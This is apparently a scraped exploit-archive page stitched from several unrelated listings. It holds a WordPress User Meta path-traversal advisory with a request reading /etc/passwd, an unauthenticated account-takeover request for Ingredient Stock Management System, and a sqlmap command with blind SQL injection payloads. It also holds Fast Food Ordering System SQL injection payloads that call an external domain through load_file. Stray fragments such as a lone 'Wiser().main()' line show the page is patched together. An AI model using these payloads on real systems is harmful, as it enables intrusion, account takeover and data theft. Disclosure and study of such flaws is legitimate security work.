 Wiser().main()

Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root

WordPress User Meta Lite and Pro plugin versions 2.4.3 and below suffer from a path traversal vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        User Meta  
Vendor URL:     https://wordpress.org/plugins/user-meta  
Type:           Relative Path Traversal [CWE-23]  
Date found:     2022-02-28  
Date published: 2022-05-24  
CVSSv3 Score:   4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)  
CVE:            CVE-2022-0779

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
User Meta Lite 2.4.3 and below  
User Meta Pro 2.4.3 and below

4. INTRODUCTION  
===============  
An easy-to-use user profile and management plugin for WordPress that allows  
user login, reset-password, profile update and user registration with extra  
fields, all on front-end and many more. User Meta Pro is a versatile user  
profile builder and user management plugin for WordPress that has the most  
features on the market. User Meta aims to be your only go to plugin for  
user management.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress ajax action "um_show_uploaded_file" is vulnerable to an  
authenticated path traversal when user-supplied input to the HTTP POST  
parameter "filepath" is processed by the web application. Since the application  
does not properly validate and sanitize this parameter, it is possible to  
enumerate local server files using a blind approach. This is because the  
application doesn't return the contents of the referenced file but instead  
returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 147  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Cookie: [your-wordpress-auth-cookies]  
Connection: close

field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true

6. RISK  
=======  
The vulnerability can be used by an authenticated attacker to enumerate  
local server files based on a blind approach.

7. SOLUTION  
===========  
Update to User Meta/User Meta Pro 2.4.4

8. REPORT TIMELINE  
==================  
2022-02-28: Discovery of the vulnerability  
2022-02-28: WPScan (CNA) assigns CVE-2022-0779  
2022-03-03: Contacted the vendor via their contact form  
2022-03-06: Vendor response, acknowledgement of the issue  
2022-03-18: Version 2.4.2 is released  
2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.  
2022-04-13: No response, contacted vendor again  
2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.  
2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.  
2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine  
2022-05-16: Fix seems to work  
2022-05-24: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress User Meta Lite / Pro 2.4.3 Path Traversal

Ingredient Stock Management System version 1.0 suffers from an account takeover vulnerability.

    # Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters# HTTPS Request :POST /isms/classes/Users.php?f=save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555Content-Length: 1023Origin: http://localhostConnection: closeReferer: http://localhost/isms/admin/?page=user/manage_userCookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="id"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="firstname"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="middlename"-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="lastname"hi-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="username"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="password"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="type"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------89160456138077069512415726555--====URL Login : http://localhost/isms/admin/login.php

Ingredient Stock Management System 1.0 Account Takeover

Ingredient Stock Management System version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromisethe application, access or modify data, or exploit latent vulnerabilitiesin the underlying database# Vulnerable Code :line 74 in file "/isms/admin/stocks/view_stock.php"$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");# Sqlmap command:sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP

Ingredient Stock Management System 1.0 SQL Injection

Fast Food Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Fast Food Ordering System 1.0 SQLi## Author: nu11secur1ty## Date: 05.30.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering## Description:The date parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'was submitted in the date parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: date (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''OR NOT 9209=9209 AND 'OBPK'='OBPK    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT(ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY    Type: UNION query    Title: MySQL UNION query (NULL) - 6 columns    Payload: page=reports&date=2022-05-30'+(selectload_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+''UNION ALL SELECTNULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering)## Proof and Exploit:[href](https://streamable.com/kkyrgk)

Tag

#php